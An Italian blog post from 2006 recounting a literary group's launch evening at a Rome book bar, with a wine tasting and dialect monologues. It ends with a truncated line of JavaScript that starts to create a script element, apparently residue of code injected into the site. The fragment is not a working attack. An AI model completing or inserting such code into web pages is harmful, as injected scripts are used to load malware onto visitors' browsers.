14 novembre 2006: E il naufragar m’è dolce…
- Posted by Cristiano Sabbatini
- on Nov, 28, 2006
- in Eventi
- No Comments.
Mentre mi preparo per la nostra Prima sento un po’ di agitazione, una strana sensazione che dallo stomaco si diffonde ovunque. Poi c’è il tragitto in macchina, la ricerca del parcheggio e finalmente l’arrivo al Tuma’s Book Bar, il locale che da qualche mese ospita le nostre riunioni.
C’è gente. È martedì sera eppure all’entrata ci sono non poche persone, alcune fumano, altre chiacchierano, tutte fanno la fila per entrare. Mi affaccio e vedo il locale “vestito a festa”, ogni cosa è come avevamo pianificato, anzi meglio. Dentro sono tutti in movimento, mentre gli ospiti danno un’occhiata ai libri sugli scaffali, Cristiano aiuta Carmen nella gestione delle liste, Francesca controlla gli ultimi dettagli e Slawka, alle prese con i microfoni, si prepara per la serata.
Sono le 21.00 e si comincia. Il Tuma’s è pieno, tra i tanti volti riconosco quelli della “squadra”. Ci sorridiamo contenti, un po’ emozionati ed eleganti. Francesca, che sembra una presentatrice professionista, conquista senza difficoltà l’attenzione del locale, poi, calici in mano, ci facciamo guidare da Slawka nella degustazione di due ottimi vini laziali. Da attenti assaggiatori ascoltiamo e seguiamo le indicazioni della nostra sommelier, ci concentriamo per cogliere i profumi di pesca o di prugna, assaporiamo gusti freschi e rotondi. E il vino scende giù come vero nettare accompagnato dagli istrionici monologhi e versi in romanesco di Michele Capuano e Antonio Pacella. Mi guardo intorno e vedo espressioni soddisfatte mentre da fuori molti curiosi si affacciano chiedendo informazioni. Abbiamo avuto successo, permettetemi di aggiungere, anche questa volta.
Se un anno fa mi avessero detto che avrei fatto parte di un “gruppo letterario” capace di ideare una rivista di qualità e di organizzare eventi come questo, avrei sorriso facendomi scappare un “magari!”. Ora sorrido e mi sento pienamente soddisfatta del nostro lavoro.
Ludovica Colussi
var d=document;var s=d.createElement(‘script’);